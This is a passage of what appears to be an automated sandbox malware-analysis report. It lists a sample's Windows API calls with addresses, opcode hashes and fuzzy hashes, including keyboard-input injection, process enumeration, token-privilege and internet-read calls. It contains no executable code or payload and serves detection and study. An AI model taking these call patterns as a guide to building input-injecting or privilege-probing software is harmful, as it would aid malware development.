            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
            • String ID: %s%d
            • API String ID: 1272988791-1110647743
            • Opcode ID: a2b6f83d110c7c3754d56fe2ef150da60fe867f064268590ce14cbe6dda5c512
            • Instruction ID: c04d58a208eac35a6d5afe8dc6bc51d3b936b8e8c14a3494b7695081a72aed69
            • Opcode Fuzzy Hash: a2b6f83d110c7c3754d56fe2ef150da60fe867f064268590ce14cbe6dda5c512
            • Instruction Fuzzy Hash: 8711D271200205ABEF12BF648D99EEE776EAF94304F04407AF949EB182DE3499099B70
            APIs
            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010358C1
            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 010358EE
            • DrawMenuBar.USER32(?), ref: 010358FD
            Strings
            Similarity
            • API ID: Menu$InfoItem$Draw
            • String ID: 0
            • API String ID: 3227129158-4108050209
            • Opcode ID: 957ce94254dfa433756a9ecd24d8b0274cf6c3482a6a2cd3257b588f873267b8
            • Instruction ID: 21c69ec5f9aa1cf64d53adefb9bc2996c49f703bb8e8505b3bf01d5a210d5180
            • Opcode Fuzzy Hash: 957ce94254dfa433756a9ecd24d8b0274cf6c3482a6a2cd3257b588f873267b8
            • Instruction Fuzzy Hash: E1018031500218AFEB619F15DC44BEFBBB8FF85360F00809AE889D61A1DB348A94DF31
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 72511a269a1d36346b9a3512e4026d0c723e1b121d45f4694f973e076883a39d
            • Instruction ID: 255efd8e3bd28682d48211f7105155dec9c0e6bba0f946c2515741337241f3a4
            • Opcode Fuzzy Hash: 72511a269a1d36346b9a3512e4026d0c723e1b121d45f4694f973e076883a39d
            • Instruction Fuzzy Hash: BEC14A75A0020AAFEB16CF98C894BAEB7B9FF48344F108598F545EB295D731DE41CB90
            APIs
            Similarity
            • API ID: Variant$ClearInitInitializeUninitialize
            • String ID:
            • API String ID: 1998397398-0
            • Opcode ID: a924ddbe92e56429540dc080de01e9e8246dca7a4138c85f2dda4cd7cb380dc0
            • Instruction ID: f3534d23f7db00bdd0ea2bc7907dd61e255c8399f591a478c526945c76d996a8
            • Opcode Fuzzy Hash: a924ddbe92e56429540dc080de01e9e8246dca7a4138c85f2dda4cd7cb380dc0
            • Instruction Fuzzy Hash: 77A15C756043109FD710EF28C885A2AB7E9FF8D710F088859F98A9B365DB38ED01CB91
            APIs
            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0103FC08,?), ref: 010005F0
            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0103FC08,?), ref: 01000608
            • CLSIDFromProgID.OLE32(?,?,00000000,0103CC40,000000FF,?,00000000,00000800,00000000,?,0103FC08,?), ref: 0100062D
            • _memcmp.LIBVCRUNTIME ref: 0100064E
            Similarity
            • API ID: FromProg$FreeTask_memcmp
            • String ID:
            • API String ID: 314563124-0
            • Opcode ID: 27d51de1c16616d267c2cdb9a1babf9e99dabe216d5b08f060f725372a6590fa
            • Instruction ID: 804b28952f6b485b4c1ddda476ab9a9a7c9ebbe9ccbd8dc3ec32c21a2cb072fd
            • Opcode Fuzzy Hash: 27d51de1c16616d267c2cdb9a1babf9e99dabe216d5b08f060f725372a6590fa
            • Instruction Fuzzy Hash: 4B813D71A00109EFDB05DF98C984EEEB7B9FF89315F204198F546AB254DB71AE06CB60
            APIs
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            • Opcode ID: 476be5d8ef7032c1700eb763bfc3eee7ec627f295c10d7ed9b016606b0913ec1
            • Instruction ID: cdab36293793a74f60d7004bf94c9e493a9a5209fa3677c381b494e32fcff938
            • Opcode Fuzzy Hash: 476be5d8ef7032c1700eb763bfc3eee7ec627f295c10d7ed9b016606b0913ec1
            • Instruction Fuzzy Hash: 5F412031A005515BDB25EBFB8C46BBE3AA5FF43370F184226F415D63D1E6784841B272
            APIs
            • GetWindowRect.USER32(011EF918,?), ref: 010362E2
            • ScreenToClient.USER32(?,?), ref: 01036315
            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01036382
            Similarity
            • API ID: Window$ClientMoveRectScreen
            • String ID:
            • API String ID: 3880355969-0
            • Opcode ID: b1170bb5818534e9ef4596c31f77a4427ddf64a99fe841b68973c67eeaa28598
            • Instruction ID: 4770cc8532b4024f24fe26f409546f76bf548af2f60ae694d2360c5a96118731
            • Opcode Fuzzy Hash: b1170bb5818534e9ef4596c31f77a4427ddf64a99fe841b68973c67eeaa28598
            • Instruction Fuzzy Hash: FE516E75900209EFDF21DF58D8809AE7BF9FF85360F108199F9A59B291D732EA41CB50
            APIs
            • socket.WSOCK32(00000002,00000002,00000011), ref: 01021AFD
            • WSAGetLastError.WSOCK32 ref: 01021B0B
            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01021B8A
            • WSAGetLastError.WSOCK32 ref: 01021B94
            Similarity
            • API ID: ErrorLast$socket
            • String ID:
            • API String ID: 1881357543-0
            • Opcode ID: 847026de9036cd9f8755d35cef04b1fcb68d86dc7478ff41ff79a67341d8df11
            • Instruction ID: da60d39cb886c1586852ebd511ca37182bea0bcfcc664a58e9371579f068844b
            • Opcode Fuzzy Hash: 847026de9036cd9f8755d35cef04b1fcb68d86dc7478ff41ff79a67341d8df11
            • Instruction Fuzzy Hash: 0041D074600210AFE721AF24C886F2A77E5AF45718F588488FA5A9F3C3D776ED418B90
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c514becb349032d76e82c56000b5e6e555c235316f9005fff2d8381864c702e1
            • Instruction ID: fa085ff5739ff0c54dab62bc83be10d2de4494a591643c4c8c28ad960b867ef1
            • Opcode Fuzzy Hash: c514becb349032d76e82c56000b5e6e555c235316f9005fff2d8381864c702e1
            • Instruction Fuzzy Hash: 8541F776A00344EFD724DF38CC41BAABBAAEB89720F15462FF141DB381D775A901A790
            APIs
            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 01015783
            • GetLastError.KERNEL32(?,00000000), ref: 010157A9
            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 010157CE
            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 010157FA
            Similarity
            • API ID: CreateHardLink$DeleteErrorFileLast
            • String ID:
            • API String ID: 3321077145-0
            • Opcode ID: cbc77f8d0710385ba2468350ac6d7c4cd3004f8db0d758ca498ab08f9cc0dae7
            • Instruction ID: abcf5cce9cf0ca7c62f3b95cf64f2f304b6112e2872cfbf7c10f2790005dd9b7
            • Opcode Fuzzy Hash: cbc77f8d0710385ba2468350ac6d7c4cd3004f8db0d758ca498ab08f9cc0dae7
            • Instruction Fuzzy Hash: 52410C75600610DFCB11EF15C945A5DBBE2AF8A320B198488EC4AAF366CB39FD41DB91
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00FC6D71,00000000,00000000,00FC82D9,?,00FC82D9,?,00000001,00FC6D71,8BE85006,00000001,00FC82D9,00FC82D9), ref: 00FDD910
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDD999
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FDD9AB
            • __freea.LIBCMT ref: 00FDD9B4
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
            • String ID:
            • API String ID: 2652629310-0
            APIs
            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0100AAAC
            • SetKeyboardState.USER32(00000080), ref: 0100AAC8
            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0100AB36
            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0100AB88
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            APIs
            • SendMessageW.USER32(?,00001024,00000000,?), ref: 01035352
            • GetWindowLongW.USER32(?,000000F0), ref: 01035375
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01035382
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010353A8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: LongWindow$InvalidateMessageRectSend
            • String ID:
            • API String ID: 3340791633-0
            APIs
            • ClientToScreen.USER32(?,?), ref: 0103769A
            • GetWindowRect.USER32(?,?), ref: 01037710
            • PtInRect.USER32(?,?,01038B89), ref: 01037720
            • MessageBeep.USER32(00000000), ref: 0103778C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Rect$BeepClientMessageScreenWindow
            • String ID:
            • API String ID: 1352109105-0
            APIs
            • GetForegroundWindow.USER32 ref: 010316EB
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • GetCaretPos.USER32(?), ref: 010316FF
            • ClientToScreen.USER32(00000000,?), ref: 0103174C
            • GetForegroundWindow.USER32 ref: 01031752
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
            • String ID:
            • API String ID: 2759813231-0
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 0100D501
            • Process32FirstW.KERNEL32(00000000,?), ref: 0100D50F
            • Process32NextW.KERNEL32(00000000,?), ref: 0100D52F
            • CloseHandle.KERNEL32(00000000), ref: 0100D5DC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • GetCursorPos.USER32(?), ref: 01039001
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FF7711,?,?,?,?,?), ref: 01039016
            • GetCursorPos.USER32(?), ref: 0103905E
            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FF7711,?,?,?), ref: 01039094
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Cursor$LongMenuPopupProcTrackWindow
            • String ID:
            • API String ID: 2864067406-0
            APIs
            • GetFileAttributesW.KERNEL32(?,0103CB68), ref: 0100D2FB
            • GetLastError.KERNEL32 ref: 0100D30A
            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100D319
            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0103CB68), ref: 0100D376
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: CreateDirectory$AttributesErrorFileLast
            • String ID:
            • API String ID: 2267087916-0
            APIs
              • Part of subcall function 01001014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0100102A
              • Part of subcall function 01001014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01001036
              • Part of subcall function 01001014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001045
              • Part of subcall function 01001014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0100104C
              • Part of subcall function 01001014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001062
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010015BE
            • _memcmp.LIBVCRUNTIME ref: 010015E1
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01001617
            • HeapFree.KERNEL32(00000000), ref: 0100161E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
            • String ID:
            • API String ID: 1592001646-0
            APIs
            • GetWindowLongW.USER32(?,000000EC), ref: 0103280A
            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01032824
            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01032832
            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01032840
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Window$Long$AttributesLayered
            • String ID:
            • API String ID: 2169480361-0
            APIs
            • InternetReadFile.WININET(?,?,00000400,?), ref: 0101CE89
            • GetLastError.KERNEL32(?,00000000), ref: 0101CEEA
            • SetEvent.KERNEL32(?,?,00000000), ref: 0101CEFE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: ErrorEventFileInternetLastRead
            • String ID:
            • API String ID: 234945975-0
            APIs
              • Part of subcall function 01008D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0100790A,?,000000FF,?,01008754,00000000,?,0000001C,?,?), ref: 01008D8C
              • Part of subcall function 01008D7D: lstrcpyW.KERNEL32(00000000,?), ref: 01008DB2
              • Part of subcall function 01008D7D: lstrcmpiW.KERNEL32(00000000,?,0100790A,?,000000FF,?,01008754,00000000,?,0000001C,?,?), ref: 01008DE3
            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01008754,00000000,?,0000001C,?,?,00000000), ref: 01007923
            • lstrcpyW.KERNEL32(00000000,?), ref: 01007949
            • lstrcmpiW.KERNEL32(00000002,cdecl,?,01008754,00000000,?,0000001C,?,?,00000000), ref: 01007984
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: lstrcmpilstrcpylstrlen
            • String ID: cdecl
            • API String ID: 4031866154-3896280584
            APIs
            • SendMessageW.USER32(?,00001060,?,00000004), ref: 010356BB
            • _wcslen.LIBCMT ref: 010356CD
            • _wcslen.LIBCMT ref: 010356D8
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01035816
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: MessageSend_wcslen
            • String ID:
            • API String ID: 455545452-0
            APIs
            • SendMessageW.USER32(?,000000B0,?,?), ref: 01001A47
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A59
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A6F
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01001A8A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 0100E1FD
            • MessageBoxW.USER32(?,?,?,?), ref: 0100E230
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0100E246
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0100E24D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
            • String ID:
            • API String ID: 2880819207-0
            APIs
            • CreateThread.KERNEL32(00000000,?,00FCCFF9,00000000,00000004,00000000), ref: 00FCD218
            • GetLastError.KERNEL32 ref: 00FCD224
            • __dosmaperr.LIBCMT ref: 00FCD22B
            • ResumeThread.KERNEL32(00000000), ref: 00FCD249
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Thread$CreateErrorLastResume__dosmaperr
            • String ID:
            • API String ID: 173952441-0
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
            • GetStockObject.GDI32(00000011), ref: 00FA6060
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: CreateMessageObjectSendStockWindow
            • String ID:
            • API String ID: 3970641297-0
            APIs
            • ___BuildCatchObject.LIBVCRUNTIME ref: 00FC3B56
              • Part of subcall function 00FC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00FC3AD2
              • Part of subcall function 00FC3AA3: ___AdjustPointer.LIBCMT ref: 00FC3AED
            • _UnwindNestedFrames.LIBCMT ref: 00FC3B6B
            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00FC3B7C
            • CallCatchBlock.LIBVCRUNTIME ref: 00FC3BA4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
            • String ID:
            • API String ID: 737400349-0
            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
            • Instruction ID: fcba80b21ed17991236f34d21d0c8a764615c39458c8611f316002bdd3949036
            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
            • Instruction Fuzzy Hash: 2D01ED3250014ABBDF115E95CD47EEB7B7DEF98794F048018FE4856121C736E961EBA0
            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FA13C6,00000000,00000000,?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue), ref: 00FD30A5
            • GetLastError.KERNEL32(?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue,01042290,FlsSetValue,00000000,00000364,?,00FD2E46), ref: 00FD30B1
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FD301A,00FA13C6,00000000,00000000,00000000,?,00FD328B,00000006,FlsSetValue,01042290,FlsSetValue,00000000), ref: 00FD30BF
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 580cd1bc17edde233e62f70889c8e0b7ff3e660823dae65d0ed98b5b9ec424be
            • Instruction ID: 888e9246e4cfb6577db35b07da192bdc8d5b782af60976f5c6053fad9dab6342
            • Opcode Fuzzy Hash: 580cd1bc17edde233e62f70889c8e0b7ff3e660823dae65d0ed98b5b9ec424be
            • Instruction Fuzzy Hash: 7101F737B01222ABDB314A78AC48A577B9EAF05B75B180622FA45F3344C726D901D7E1
            APIs
            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0100747F
            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01007497
            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010074AC
            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 010074CA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Type$Register$FileLoadModuleNameUser
            • String ID:
            • API String ID: 1352324309-0
            • Opcode ID: b88e65acaaf1088aed0d9471a52a7cb92e2b9f712494bded0319a0e8da2aa459
            • Instruction ID: 6f94a98e3b9c53f19fd1a95703181710f34588d7f88b68b53bcbeedd793a166a
            • Opcode Fuzzy Hash: b88e65acaaf1088aed0d9471a52a7cb92e2b9f712494bded0319a0e8da2aa459
            • Instruction Fuzzy Hash: 92115BB5201305ABF7318F14ED09B967FFCEB00B04F01856AA6D6E6181DBB9F904CB60
            APIs
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0C4
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0E9
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B0F3
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0100ACD3,?,00008000), ref: 0100B126
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CounterPerformanceQuerySleep
            • String ID:
            • API String ID: 2875609808-0
            • Opcode ID: c6598b675106e3cc019c4df98b8ca6e4a47fac3c2a9ba47776feee7011ca5ae2
            • Instruction ID: 0bf307b3f98f6545c4a870455f2a125b5e57c9f6eeb719ed46911f432eb7888a
            • Opcode Fuzzy Hash: c6598b675106e3cc019c4df98b8ca6e4a47fac3c2a9ba47776feee7011ca5ae2
            • Instruction Fuzzy Hash: A0115B35C0161CE7EF11EFE4E958AEEBFB8FF0A711F404086E981B2185CB3596608B91
            APIs
            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01002DC5
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 01002DD6
            • GetCurrentThreadId.KERNEL32 ref: 01002DDD
            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01002DE4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
            • String ID:
            • API String ID: 2710830443-0
            • Opcode ID: c355c16005aa87c70d71afc72b2f06cdc244f8e718d1d51bc0f3eefd86bdf867
            • Instruction ID: eadb4648a2b5065c50888a8485e4ec183229f15b51a4724b06af04f31de77914
            • Opcode Fuzzy Hash: c355c16005aa87c70d71afc72b2f06cdc244f8e718d1d51bc0f3eefd86bdf867
            • Instruction Fuzzy Hash: 1DE06D711012247AFB312A669D0DEEB3E6CEB46BA1F000056B245E1080DAAAD840D7B0
            APIs
              • Part of subcall function 00FB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96A2
              • Part of subcall function 00FB9639: BeginPath.GDI32(?), ref: 00FB96B9
              • Part of subcall function 00FB9639: SelectObject.GDI32(?,00000000), ref: 00FB96E2
            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01038887
            • LineTo.GDI32(?,?,?), ref: 01038894
            • EndPath.GDI32(?), ref: 010388A4
            • StrokePath.GDI32(?), ref: 010388B2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
            • String ID:
            • API String ID: 1539411459-0
            • Opcode ID: 73975c259957d958623dceafe2223b87e8c12529991245b41a14be87fd056e81
            • Instruction ID: a4c7066b602399a29dbaf9ff92e38263496d5f861755071cc48118d9d4b971d4
            • Opcode Fuzzy Hash: 73975c259957d958623dceafe2223b87e8c12529991245b41a14be87fd056e81
            • Instruction Fuzzy Hash: BEF05E36045658BAEB225F98AD09FCE3F6DAF06310F048142FB92B50D5C7BA5111DFE5
            APIs
            • GetSysColor.USER32(00000008), ref: 00FB98CC
            • SetTextColor.GDI32(?,?), ref: 00FB98D6
            • SetBkMode.GDI32(?,00000001), ref: 00FB98E9
            • GetStockObject.GDI32(00000005), ref: 00FB98F1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$ModeObjectStockText
            • String ID:
            • API String ID: 4037423528-0
            • Opcode ID: e40f49c524f0689c28083ac2f64e0e7a30b2f948a864171c16972a74d66e155a
            • Instruction ID: 845e3cee4b843cac57105d70ba495c7d051706d5cc4fa1fcb4278ee1f40be894
            • Opcode Fuzzy Hash: e40f49c524f0689c28083ac2f64e0e7a30b2f948a864171c16972a74d66e155a
            • Instruction Fuzzy Hash: CAE06531644284AAEB315B75A909BE87F14AB12335F08821AF7F5A40E4C3764640AB10
            APIs
            • GetCurrentThread.KERNEL32 ref: 01001634
            • OpenThreadToken.ADVAPI32(00000000,?,?,?,010011D9), ref: 0100163B
